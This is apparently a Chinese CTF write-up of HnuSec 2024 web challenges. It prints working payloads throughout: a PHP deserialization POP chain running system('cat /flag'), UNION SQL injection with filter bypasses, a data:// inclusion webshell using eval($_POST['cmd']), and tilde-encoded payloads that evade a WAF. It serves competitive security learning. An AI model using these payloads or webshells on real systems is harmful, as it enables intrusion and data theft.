HnuSec 2024 CTF

战况

两个二血一个一血，有一题题目出问题了导致没能拿下
出题人说算我ak了好吧

What Do You Want!

看样子应该是robotx.txt协议了

那么访问/The_Deep_Ends看看

那么就是XFF了，可惜不行，用bp爆破出来是X-Client-IP: 127.0.0.1
然后就是一系列的http的东西了就直接放payload了，这里的Via也是挺折磨我的，以前没见过然后找了好久而且悟空官网路径忘记加www一直错，给我整的快吐血了

访问/The_Golden_Light

那么就是简单的cookie传参了

ez_serialize

进来提示，感觉是cookie验证

打开hacker一看果然是，吧cookie里面的值改成admin就过去了

访问/hhhheelllloooo.php就是源码了

<?php
highlight_file(__FILE__);
error_reporting(0);

class WOWO{
    private $nano;
    public $hahaha;
    public $evn;

    public function __destruct()
    {
        $this->evn->do='do you know serialize?';
    }

    public function __get($a){
        echo $this->hahaha;
    }
}

class Soga{
    public $asdj;
    public $grape;

    public function __invoke()
    {
        return $this->asdj->nano;
    }
    public  function __toString()
    {
        $this->grape='123';
        return 'are you sure?';
    }
}


class H{
    public $a ;
    public $b ;

    public function __toString()
    {
        $Love=$this->a;
        $Love('',$this->b);
        return "it's too esay,yet?";
    }
}

class NANI{
    public $lal;
    public $so;

    public function __set($star,$bob){
        $str=$this->lal;
        $str();

    }
}

class Dman{
    public $apple;
    public $strawberry;

    public function __invoke(){
        return $this->apple;
    }

    public function __get($a){
        $des=$this->strawberry;
        $des();
    }

}

class Hnu{
    public $sun='HnuSec is very good';
    public $setad='do you think so?';

    public function __destruct(){
        if($this->setad='yes'){
            echo 'Thank you,have a fun.';
        }
    }
}

if(isset($_POST['Hnu'])){
    $cmd=$_POST['Hnu'];
    unserialize(base64_decode($cmd));
}

?> 

开始构造pop链，下面是我构造的，注意是反过来的
H_tostring->WOWO_get->Soga_invoke->NANI_set->WOWO_destruct
其他的魔术方法下面没有可控参数大于2的，于是就只剩H类下面的toString了
那么看看我的payload

<?php
//H_tostring->WOWO_get->Soga_invoke->NANI_set->WOWO_destruct
class WOWO
{
    private $nano;
    public $hahaha;
    public $evn;
}
class Soga
{
    public $asdj;
    public $grape;
}
class H
{
    public $a="create_function";
    public $b="}system('cat /flag');//";
}
class NANI
{
    public $lal;
    public $so;
}
$a = new WOWO();
$a->evn = new NANI();
$a->evn->lal = new Soga();
$a->evn->lal->asdj = new WOWO();
$a->evn->lal->asdj->hahaha = new H();
echo base64_encode(serialize($a));
?>

成功拿到flag

谢谢皮蛋🥚

我进来就是传一个1,然后报错提示，看来是数字注入

然后就开始走流程
输入1 group by 2#爆列数 //两列
输入1 union select 1,2#报错如下

猜测是union被替换了于是
输入-11 ununionion select 1,2# 爆回显位置
输入-11 ununionion select 1,group_concat(table_name) from information_schema.tables where table_schema=database()# 爆表名，发现=被过滤了，绕过一下
输入-11 ununionion select 1,group_concat(table_name) from information_schema.tables where table_schema like database()#

输入-11 ununionion select 1,group_concat(column_name) from information_schema.columns where table_schema like database()# 爆列名字

看组合就是每个表三列了
输入-11 ununionion select 1,group_concat(des,'~',value) from F149#

海北大学后台管理系统Plus

看一下源码发现用户名

用题目给的字典爆破就好了，显而易见的密码

进来了就随便输入点东西


这密码就藏在源码里，放到hacker里base64解码一下，然后输入

拿到地址/Ewoji/final0012llsnn.php，访问发现是文件包含的题目，源码如下

 <?php
highlight_file(__FILE__);
function waf(){
    if(preg_match("/<|\?|php|>|echo|filter|system|file|%|&|=|`|eval/i",$_GET['data'])){
        die("dangerous function detect!");
    };
}
if(isset($_GET['phpinfo'])){
    phpinfo();
}
waf();
include $_GET['data'];
?> 

ban掉了filter，并且参数是data，猜测用

data://
数据流封装器，以传递相应格式的数据。可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行。

然后ban了好多东西，想执行命令只能用base64编码的形式了
传入?data=data://text/plain;base64,<script language="php">eval($_POST['cmd']); </script>
（这里后面没编码是为了大家看清楚，实际使用需要base64编码，下同）

传进去后台会把一个’>’吃了，猜测有waf
所以传入?data=data://text/plain;base64,<?php @eval($_POST['cmd']);?>>

之后就是用cat读flag了

海北大学后台管理系统

进来就是和上面plus一样的界面，不过这次东西全在源码里
第二关也是看源码发现base64编码的密码
和puls一样的步骤不多解释
访问/Ewoji/final.php，展示源码

<?php
//我是何晨光，我不想在战场上敌人捡到我的后门就可以直接使用，所以我决定加点限制
highlight_file(__FILE__);
error_reporting(0);
if(isset($_POST['num1']) && isset($_POST['num2'])){

    $num1 = $_POST['num1'];
    $num2 = $_POST['num2'];

    if( $num1!=$num2 && md5($num1) === md5($num2)){
        echo "继续吧";

        if(isset($_GET['cmd'])){
            $cmd = $_GET['cmd'];
            if(!preg_match("/flag|system|php|cat|\*|\_|tac|less|more|\.| |\'/i", $cmd)){
                eval($cmd);
            }

        }
    }else{
        echo "nonono";
    }
}
?>

md5直接选择数组绕过

看了一下发现没过滤’~’，直接选择取反绕过，脚本如下（使用前记得更改）

<?php
$a='assert';
echo urlencode(~$a);
echo"<br/>";
$b='(eval($_POST[cmd]))';
echo urlencode(~$b);
?>

?cmd=(~%8C%86%8C%8B%9A%92)(~%93%8C%DF%D0);
实际就是system("ls /");

输入?cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%99%99%99%93%9E%98);
实际就是system("cat /fffflag");
拿到一长串

继续吧恭喜你找到flag！我负责任的告诉你,secret:后面的字符是你需要的东西，但EWOJI五个大写字符不是你需要的东西EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:flWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:ag{OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:salJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:lasjIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:lsdEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:13-WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:mOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:ccJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:abIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:obEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:2WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:4OOOOOOOOOOOOOOOOOOOOOOOOOsecret:zzJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:mkIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:bxEEEEEEEEEEEEEEEEEEEEEEEsecret:2-WWWWWWWWWWWWWWWsecret:zxOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:dsJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:gohIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:dsxEEEEEEEEEEEEEEEEEEEEEsecret:zxcWWWWWWWWWWWWsecret:zxwOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOosecret:0-JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:ddxIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:zxwEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:12sWWWWWWWWWWWWWWWWsecret:dsxOOOOOOOOOOOOOOOOOOOOsecret:asxJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:zIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:zkEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:f-WWWWWWWWWWWWWWWWWWWWWWsecret:awOOOOOOOOOOOOsecret:xfJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:axdIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:amdEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:p2-WWWWWWWWWWWWWWsecret:xxOOOOOOOOOOOOOOOOOOOOOOOOsecret:zJJJJJJJJJJJJJJJJJJJJsecret:moIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:yhEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:aaWWWWWWWWWWWWsecret:tOOOOOOOOOOOOOOOOsecret:23JJJJJJJJJJJJJJJJJsecret:qw-IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:asdEEEEEEEEEEEEEEEEEEEEsecret:ghWWWWWWWWWWWWWWWWsecret:zxcOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:22JJJJJJJJJJJJJJJJJJJJJJsecret:czxcIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:owmEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:231WWWWWWWWWWWWWsecret:bye!} 

编写脚本把里面多余的删除，脚本如下

<?php
$string = "EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:flWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:ag{OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:salJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:lasjIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:lsdEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:13-WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:mOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:ccJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJjsecret:abIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIiisecret:obEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:2WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWsecret:4OOOOOOOOOOOOOOOOOOOOOOOOOsecret:zzJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:mkIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:bxEEEEEEEEEEEEEEEEEEEEEEEsecret:2-WWWWWWWWWWWWWWWsecret:zxOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:dsJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:gohIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIisecret:dsxEEEEEEEEEEEEEEEEEEEEEsecret:zxcWWWWWWWWWWWWsecret:zxwOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOosecret:0-JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:ddxIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:zxwEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:12sWWWWWWWWWWWWWWWWsecret:dsxOOOOOOOOOOOOOOOOOOOOsecret:asxJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:zIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:zkEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:f-WWWWWWWWWWWWWWWWWWWWWWsecret:awOOOOOOOOOOOOsecret:xfJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJsecret:axdIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:amdEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:p2-WWWWWWWWWWWWWWsecret:xxOOOOOOOOOOOOOOOOOOOOOOOOsecret:zJJJJJJJJJJJJJJJJJJJJsecret:moIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIisecret:yhEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:aaWWWWWWWWWWWWsecret:tOOOOOOOOOOOOOOOOsecret:23JJJJJJJJJJJJJJJJJsecret:qw-IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:asdEEEEEEEEEEEEEEEEEEEEsecret:ghWWWWWWWWWWWWWWWWsecret:zxcOOOOOOOOOOOOOOOOOOOOOOOOOOOOOsecret:22JJJJJJJJJJJJJJJJJJJJJJsecret:czxcIIIIIIIIIIIIIIIIIIIIIIIIIIsecret:owmEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEsecret:231WWWWWWWWWWWWWsecret:bye!}";
$pat = "/secret:|[EWOJI]/";
$re = "";
$new = preg_replace($pat, $re, $string);
echo $new;
?>

运行脚本拿到flag